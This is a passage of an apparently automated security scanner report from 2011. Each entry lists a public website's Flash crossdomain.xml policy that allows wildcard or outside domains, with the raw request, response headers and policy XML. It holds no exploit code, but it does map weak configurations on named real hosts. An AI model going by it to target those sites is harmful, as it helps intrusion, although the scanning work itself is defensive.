<allow-access-from domain="*.firstmediaworks.org" />
...[SNIP]...

7.221. http://www.alarabiya.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.alarabiya.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.alarabiya.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:22:42 GMT
Expires: Wed, 04 May 2011 01:27:42 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 08:40:24 GMT
ETag: "3e38055-282-4a25b1754ce00"
Accept-Ranges: bytes
Content-Length: 642
Cache-Control: max-age=300, must-revalidate
Vary: Accept-Encoding
Content-Type: text/xml
X-Cache: HIT from 12.120.9.61
Via: 1.1 12.120.9.61:80 (cache/2.6.2.3.13.ATT)
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gstatic.com" secure="false"/>
...[SNIP]...

7.222. http://www.apropo.ro/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apropo.ro
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apropo.ro

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:06:33 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
Last-Modified: Fri, 11 Mar 2011 08:42:48 GMT
ETag: "220dc746-158-49e30f2533200"
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: application/xml

...<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.ad20.net" />
   <allow-access-from domain="*.apropo.ro"/>
   <allow-access-from domain="*.mpinteractiv.ro"/>
   <allow-access-from domain="*.protv.ro"/>
   <allow-access-from domain="*.sport.ro"/>
...[SNIP]...

7.223. http://www.arcadefire.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.arcadefire.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.arcadefire.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:21 GMT
Server: Apache
Last-Modified: Wed, 26 May 2010 18:36:22 GMT
ETag: "7d3e48b-107-487838cf25580"
Accept-Ranges: bytes
Content-Length: 263
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.arcadefire.com" />
<allow-access-from domain="arcadefire.com" />
...[SNIP]...

7.224. http://www.atlanticbb.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.atlanticbb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.atlanticbb.com

Response

HTTP/1.1 200 OK
Content-Length: 211
Content-Type: text/xml
Last-Modified: Mon, 10 Sep 2007 05:00:00 GMT
Accept-Ranges: bytes
ETag: "089f7067f3c71:78a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:15:05 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.atlanticbb.com" />
<allow-access-from domain="*.ookla.com" />
<allow-access-from domain="*.speedtest.net" />
</cross-doma
...[SNIP]...

7.225. http://www.aviationweek.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aviationweek.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aviationweek.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 04 May 2011 03:03:03 GMT
Content-type: text/plain
Last-modified: Mon, 20 Oct 2008 18:23:11 GMT
Content-length: 475
Etag: "1db-48fccc8f"
Accept-ranges: bytes
Connection: close


<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy

SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="72.3.226.28"/>

<allow-access-from domain="isg-marketing.com"/>
<allow-access-from domain="*.isg-marketing.com"/>
<allow-access-from domain="*.aviationweek.com"/>
<allow-access-from domain="*.aviationnow.com"/>

<allow-access-from domain="http://sitelife.aviationweek.com"/>
...[SNIP]...

7.226. http://www.bauerfinancial.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bauerfinancial.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bauerfinancial.com

Response

HTTP/1.1 200 OK
Content-Length: 278
Content-Type: text/xml
Last-Modified: Fri, 28 Dec 2007 13:36:27 GMT
Accept-Ranges: bytes
ETag: "515377a55649c81:468"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:24:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bauerfinancial.com" />
<allow-access-from domain="bauerfinancial.com" />
...[SNIP]...

7.227. http://www.bebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bebo.com

Response

HTTP/1.0 200 OK
Server: Resin/3.0.24
ETag: "GVbY6cyl+Xo"
Last-Modified: Wed, 17 Mar 2010 18:37:48 GMT
Content-Type: text/xml
Content-Length: 798
Date: Wed, 04 May 2011 00:49:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.woolsery.com" />
<allow-access-from domain="*.woolsery.com:8080" />
<allow-access-from domain="bebo.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.alonda.com" />
<allow-access-from domain="*.safesocialnetworking.com" />
<allow-access-from domain="safesocialnetworking.com" />
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.*.aol.com" />
<allow-access-from domain="*.aolcdn.com" /><allow-access-from domain="*.bebo2nd.com"/>
...[SNIP]...

7.228. http://www.bigwigmedia.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bigwigmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bigwigmedia.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:46:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 29 Jul 2010 08:56:51 GMT
ETag: "21501a2-5e-ea46fac0"
Accept-Ranges: bytes
Content-Length: 94
Connection: close
Content-Type: text/xml

<cross-domain-policy>
   <allow-access-from domain="*.bigwigmedia.com" />
</cross-domain-policy>

7.229. http://www.bollywoodhungama.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bollywoodhungama.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bollywoodhungama.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 10 Aug 2010 09:04:24 GMT
ETag: "d92444-53d-48d746b5fb600"
Content-Type: text/xml
Expires: Wed, 04 May 2011 03:05:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 03:05:11 GMT
Content-Length: 1341
Connection: close

<cross-domain-policy>
<allow-access-from domain="*.indiafm.com" to-ports="80" />
<allow-access-from domain="*.bollywoodhungama.com" to-ports="80" />
<allow-access-from domain="*.gaminghungama.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.hungama.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="hungama.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="indiafm.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="bollywoodhungama.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="69.59.141.218" to-ports="80" />
...[SNIP]...
<allow-access-from domain="202.87.41.150" to-ports="80" />
...[SNIP]...
<allow-access-from domain="bhvideos.s3.amazonaws.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.bollywoodhungama.com.s3.amazonaws.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.bollywoodhungama.com.edgesuite.net" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.hungamatech.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.hungamaone.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.brandingbrands.net" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.vision-asia.tv" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.vdopia.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.visionasia.com.au" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.visionasia.co.nz" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.monsoonads.com"/>
...[SNIP]...

7.230. http://www.bookreporter.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bookreporter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bookreporter.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: text/xml
Date: Wed, 04 May 2011 03:25:32 GMT
Accept-Ranges: bytes
ETag: "cae623756b5fcb1:0"
Connection: close
Set-Cookie: X-Mapping-daapjdkj=0E0C0DB54D846BB1E2075AF98DE2CAF3; path=/
Last-Modified: Wed, 29 Sep 2010 00:15:44 GMT
X-Powered-By: ASP.NET
Content-Length: 268

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.jeffersonrabb.com" />
<allow-access-from domain="*.myspace.com" />
...[SNIP]...

7.231. http://www.brainshark.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.brainshark.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.brainshark.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 04 Feb 2011 04:19:34 GMT
Accept-Ranges: bytes
ETag: "6b3645ba22c4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="NON DSP COR ADM DEV PSA IVA CONi TELi OUR BUS NAV"
Date: Wed, 04 May 2011 02:26:53 GMT
Connection: close
Content-Length: 299

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="maste
...[SNIP]...
<allow-access-from domain="*.brainshark.com" secure="false" />
...[SNIP]...

7.232. http://www.brandonsun.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.brandonsun.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.brandonsun.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 02 May 2011 21:34:01 GMT
X-Server-Name: dv-c1-r3-u7-b5
Content-Type: text/xml;charset=utf-8
Date: Wed, 04 May 2011 03:19:50 GMT
Content-Length: 787
Connection: close
Set-Cookie: click_mobile=0

<?xml version="1.0"?>
<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.canada.com"/>
   <allow-access-from domain="canada.com"/>
   <allow-access-from domain="winnipegfreepress.com" />
   <allow-access-from domain="www.winnipegfreepress.com" />
   <allow-access-from domain="media.winnipegfreepress.com" />
   <allow-access-from domain="dev.www.winnipegfreepress.com" />
   <allow-access-from domain="stage.www.winnipegfreepress.com" />
   <allow-access-from domain="brandonsun.com" />
   <allow-access-from domain="*.brandonsun.com" />
   <allow-access-from domain="uptownmag.com" />
   <allow-access-from domain="*.uptownmag.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

7.233. http://www.brightstorm.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.brightstorm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.brightstorm.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:52:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.6
Last-Modified: Mon, 09 Feb 2009 20:26:05 GMT
ETag: "2e2670-15f-462822e115140"
Accept-Ranges: bytes
Content-Length: 351
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.ec2-67-202-61-36.compute-1.amazonaws.com" />
<allow-access-from domain="*.google-analytics.com" />
...[SNIP]...

7.234. http://www.bvonmoney.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bvonmoney.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bvonmoney.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:10 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 420
Keep-Alive: timeout=5, max=999987
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="*.bvnewswire.com" />
...[SNIP]...

7.235. http://www.carpetone.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.carpetone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.carpetone.com

Response

HTTP/1.0 200 OK
Content-Length: 235
Content-Type: text/xml
Content-Location: http://www.carpetone.com/crossdomain.xml
Last-Modified: Fri, 03 Apr 2009 14:59:55 GMT
Accept-Ranges: bytes
ETag: "80672fd96cb4c91:41c"
Server: Microsoft-IIS/6.0
Date: Wed, 04 May 2011 01:55:45 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.allurent.net" secure="false"/>
...[SNIP]...

7.236. http://www.cc.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cc.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cc.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:39:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS0f449160d4209f66c7e8bc6141d3636c=q1i4v7cqjrcek88atm29frj050; expires=Fri, 27 May 2011 06:12:40 GMT; path=/; domain=.cc.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 02:39:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Length: 337
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.cc.org" />
<allow-access-from domain="*.www.cc.org" />
<allow-access-from domain="cc.org" />
<allow-access-from domain="*.cc.org" />
...[SNIP]...

7.237. http://www.choicehotels.ca/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.choicehotels.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.choicehotels.ca

Response

HTTP/1.0 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
ETag: W/"238-1297861222000"
Last-Modified: Wed, 16 Feb 2011 13:00:22 GMT
Content-Type: application/xml
Content-Length: 238
Date: Wed, 04 May 2011 03:11:34 GMT
Connection: close

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

7.238. http://www.clearrate.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.clearrate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clearrate.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:08:29 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.5.1 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Sun, 23 May 2010 19:18:50 GMT
ETag: "3c97f235-ed-48747cb532ef6"
Accept-Ranges: bytes
Content-Length: 237
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="www.clearrate.com"/>
<allow-access-from domain="216.254.95.41"/>
<allow-access-from domain="*.dslreports.com"/>
<allow-access-from domain="*.broadbandreports.com"/>
...[SNIP]...

7.239. http://www.clintonfoundation.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.clintonfoundation.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clintonfoundation.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:55:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 18 Sep 2009 16:14:31 GMT
ETag: "6728442-28b-6d5307c0"
Accept-Ranges: bytes
Content-Length: 651
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.derrikengel.com"/>
   <allow-access-from domain="derrikengel.com"/>
   <allow-access-from domain="*.derrikengel.com"/>
...[SNIP]...
<allow-access-from domain="www.haitispecialenvoy.org"/>
   <allow-access-from domain="haitispecialenvoy.org"/>
   <allow-access-from domain="*.haitispecialenvoy.org"/>
...[SNIP]...

7.240. http://www.customclassictrucks.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.customclassictrucks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.customclassictrucks.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 00:44:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=alxp4k45eof2ll45prr331fw; path=/; HttpOnly
Set-Cookie: UserPuid=2336758745726557286; domain=customclassictrucks.com; expires=Wed, 04-May-2061 00:44:41 GMT; path=/
Cache-Control: private
Content-Type: text/xml
Content-Length: 3634

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.4wdandsportutility.com" />
<allow-access-from domain="*.4wheeloffroad.com" />
<allow-access-from domain="*.4wdandsportutility.com" />
<allow-access-from domain="*.atvrideronline.com" />
<allow-access-from domain="*.autobuyguide.com" />
<allow-access-from domain="*.automobilemag.com" />
<allow-access-from domain="*.automotive.com" />
<allow-access-from domain="*.camaroperformers.com" />
<allow-access-from domain="*.caraudiomag.com" />
<allow-access-from domain="*.carcraft.com" />
<allow-access-from domain="*.chevyhiperformance.com" />
<allow-access-from domain="*.circletrack.com" />
<allow-access-from domain="*.classictrucks.com" />
<allow-access-from domain="*.corvettefever.com" />
<allow-access-from domain="*.customclassictrucks.com" />
<allow-access-from domain="*.customrodder.com" />
<allow-access-from domain="*.dieselpowermag.com" />
<allow-access-from domain="*.dirtrider.com" />
<allow-access-from domain="*.europeancarweb.com" />
<allow-access-from domain="*.eurotuner.com" />
<allow-access-from domain="*.fourwheeler.com" />
<allow-access-from domain="*.gmhightechperformance.com" />
<allow-access-from domain="*.highperformancepontiac.com" />
<allow-access-from domain="*.hondatuningmagazine.com" />
<allow-access-from domain="*.hotbikeweb.com" />
<allow-access-from domain="*.hotrod.com" />
<allow-access-from domain="*.hotrodsbikeworks.com" />
<allow-access-from domain="*.importtuner.com" />
<allow-access-from domain="*.intellichoice.com" />
<allow-access-from domain="*.internetautoguide.com" />
<allow-access-from domain="*.jpmagazine.com" />
<allow-access-from domain="*.kitcarmag.com" />
<allow-access-from domain="*.lowridermagazine.com" />
<allow-access-from domain="*.minitruckinweb.com" />
<allow-access-from domain="*.modified.com" />
<allow-access-from domain="*.modifiedmustangs.com" />
<allow-access-from domain="*.moparmusclemagazine.com" />
<allow-access-from domain="*.motorcyclecruiser.com" />
<allow-access-from domain="*.motorcyclistonline.com" />
<allow-access-from domain="*.motortrend.com" />
<allow-access-from domain="*.motortrendenespanol.com" />
<allow-access-from domain="*.musclemustangfastfords.com" />
<allow-access-from domain="*.mustang50magazine.com" />
<allow-access-from domain="*.mustangandfords.com" />
<allow-access-from domain="*.mustangmonthly.com" />
<allow-access-from domain="*.newcar.com" />
<allow-access-from domain="*.off-roadweb.com" />
<allow-access-from domain="*.popularhotrodding.com" />
